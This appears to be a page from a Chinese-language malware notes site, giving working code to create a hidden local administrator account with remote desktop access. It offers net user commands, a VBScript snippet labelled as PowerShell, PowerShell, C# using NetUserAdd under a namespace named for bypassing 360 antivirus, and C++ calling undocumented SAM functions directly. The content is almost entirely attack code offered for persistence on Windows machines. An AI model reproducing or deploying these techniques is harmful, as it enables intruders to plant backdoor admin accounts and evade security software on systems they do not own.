M
M
Malware Note
1.0.0
搜索文档…
⌃K

新建用户

新建用户并添加管理员及远程访问权限
命令行:
net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add
Powershell:
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"
Powershell(另一个版本):
$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"
c#(使用系统 API 函数):
using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
public static class BypassUAC_csharp
{
[DllImport("kernel32.dll")]
static extern void ExitProcess(uint uExitCode);
public static void Main(string[] args)
{
LocalGroupUserHelper local = new LocalGroupUserHelper();
string username = "qwqdanchun";
string password = "password";
string groupname = "Administrators";
local.AddUser(null, username, password, null);
local.GroupAddMembers(null, groupname, username);
ExitProcess(1);
}
}
public class LocalGroupUserHelper
{
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct LOCALGROUP_MEMBERS_INFO_3
{
public string domainandname; // //lgrmi3_domainandname
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string usri1_name;
public string usri1_password;
public int usri1_password_age;
public int usri1_priv;
public string usri1_home_dir;
public string comment;
public int usri1_flags;
public string usri1_script_path;
}
public void AddUser(string serverName, string userName, string password, string strComment)
{
USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
NewUser.usri1_name = userName; // Allocates the username
NewUser.usri1_password = password; // allocates the password
NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
NewUser.comment = strComment; // Comment on the User
NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding User");
}
}
public void GroupAddMembers(string serverName, string groupName, string userName)
{
LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
NewMember.domainandname = userName;
if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
{
Console.WriteLine("Error Adding Group Member");
}
}
}
}
c++(重写AddUser):
#include "ApiAddUser.h"
int wmain(int argc, wchar_t* argv[])
{
UNICODE_STRING UserName;
UNICODE_STRING PassWord;
HANDLE ServerHandle = NULL;
HANDLE DomainHandle = NULL;
HANDLE UserHandle = NULL;
ULONG GrantedAccess;
ULONG RelativeId;
NTSTATUS Status = NULL;
HMODULE hSamlib = NULL;
HMODULE hNtdll = NULL;
HMODULE hNetapi32 = NULL;
LSA_HANDLE hPolicy = NULL;
LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
USER_ALL_INFORMATION uai = { 0 };
hSamlib = LoadLibraryA("samlib.dll");
hNtdll = LoadLibraryA("ntdll");
pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
RtlInitUnicodeString(&UserName, L"Admin");
RtlInitUnicodeString(&PassWord, L"Admin");
Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);
Status = SamOpenDomain(ServerHandle,
DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS,
DomainInfo->DomainSid,
&DomainHandle);
Status = SamCreateUser2InDomain(DomainHandle,
&UserName,
USER_NORMAL_ACCOUNT,
USER_ALL_ACCESS | DELETE | WRITE_DAC,
&UserHandle,&GrantedAccess,&RelativeId);
RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
uai.NtPasswordPresent = TRUE;
uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;
Status = SamSetInformationUser(UserHandle,
UserAllInformation,
&uai);
return 0;
}